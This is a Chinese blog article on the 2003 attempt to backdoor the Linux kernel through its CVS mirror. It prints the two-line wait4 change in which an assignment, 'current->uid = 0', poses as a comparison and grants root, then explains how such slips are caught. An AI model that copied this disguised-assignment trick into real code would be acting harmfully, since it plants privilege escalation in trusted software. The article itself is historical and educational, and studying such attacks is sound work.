如何在Linux中安插一个后门?

Linux内核是开源的代码,能不能向其中安插一个后门呢?这是一件难度很高的操作,但是有人却差点儿成功了,我们来看看这是怎么回事。

时间回到2003年,当时Linux内核的代码主仓库保存在一个叫做BitKeeper的商业软件中。如果想对Linux内核代码进行修改的话,需要走一个审批流程,以此来确定这次更改能否被接受。每一次更改都有一个简单的说明,其中包含一个指向审批记录的链接。

但是有些人不喜欢BitKeeper(堂堂的Linux怎么能保存在闭源的商业软件中?!), 于是一个CVS(估计好多人都没听说过它了吧)被建立了起来,其中保存着从BitKeeper clone来的代码, 这样开发人员可以用开源的CVS来访问Linux代码。

2003年11月5号,Larry McVoy 注意到了一件怪事,CVS中的一个代码变更没有包含审批记录的链接, 这是怎么回事?

经过一番调查发现:从来没有人批准过这个代码变更,奇怪的是,这个代码变更并没有出现在BitKeeper主仓库中,原来是有人黑进了CVS的服务器,偷偷插入了一段代码。这段代码到底做了什么事情呢?

这段代码修改了一个叫做wait4的Linux函数,程序可以使用wait4来等待一些事情的发生,这个代码变更增加了这么两行:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) 
        retval = -EINVAL; 

(代码可左右滑动,懂得C语言的同学可以思考下,这段代码有什么不寻常的?)

粗一看这段代码,就会觉得这没啥啊?不就是做一点条件检查吗,不满足条件就返回错误。

但是仔细看看就会发现事情不对,第一行的最后, 有个”current->uid=0″, 而不是 “current->uid == 0” 。

正常的写法应该是“==0”, 就是检查当前的用户ID是不是0, 写成“=0”就是把当前用户ID设置为0 , 而ID为0的用户是”root” !

这就意味着,如果这段代码被执行,当前用户就会变成root,可以在系统中为所欲为!

这其实是个经典的后门, 想象一个,一个黑客在Linux运行了一个程序,这个程序调用了wait4, 然后这个黑客突然间具备了root权限!

这个后门可是真够聪明的,伪装成了条件检查,试图蒙混过关,如果一直没人发现会怎么样呢?

首先,后门存在CVS中,不在BitKeeper的主仓库中,从BitKeeper 代码库Build出的Linux肯定没问题, 但是如果有人从CVS代码库中build了Linux, 那就中招了。

其次,搞破坏的家伙可能有这样的预期:有个被Linus Torvalds所信任的内核开发者,他讨厌BitKeeper,并且在使用CVS, 那当他修改了代码,准备通过邮件的方式向Linus Torvalds发送patch的时候发现,咦,wait4这里也有个code change, 是做条件检查的,也包括进去吧。Linus收到补丁,一看是自己信任的兄弟提交的,没有仔细检查,于是后门代码进入了主代码仓库。

这当然是猜测的场景,也算是一种社会工程学攻击吧,不过Linux团队非常小心,把这个后门给揪了出来。

故事到这里就可以结束了,再就这个话题扩展一下,多说两句。

我记得刚工作的时候,有个同事给我说,在C语言中,当需要和0比较的时候,可以把0放到前面,这么写:

if( 0 == user_id){ ....... } 

这样即使把 == 写成了 = , 编译器就会发现错误。我当时觉得挺古怪的,把一个数字放到前面,变量放到后面。后来习惯了,在Java 也经常会这样写 if (null == user){ …… }

其实现在的IDE都很智能了,像这种把==写成=的情况,IDE就可以给出警告。即使没有用IDE,如果对源码做静态的代码分析,也会被抓出来的警告的。

Linux是开源的代码,任何人,只要你愿意,都可以查看所有的代码,这相当于把Linux放到了阳光底下,无数双眼睛都盯着看,这种透明度使得在其中安插一个后门是非常难的。

参考资料:

https://lwn.net/Articles/57135/

The Linux Backdoor Attempt of 2003

【本文为51CTO专栏作者“刘欣”的原创稿件,转载请通过作者微信公众号coderising获取授权】

戳这里,看该作者更多好文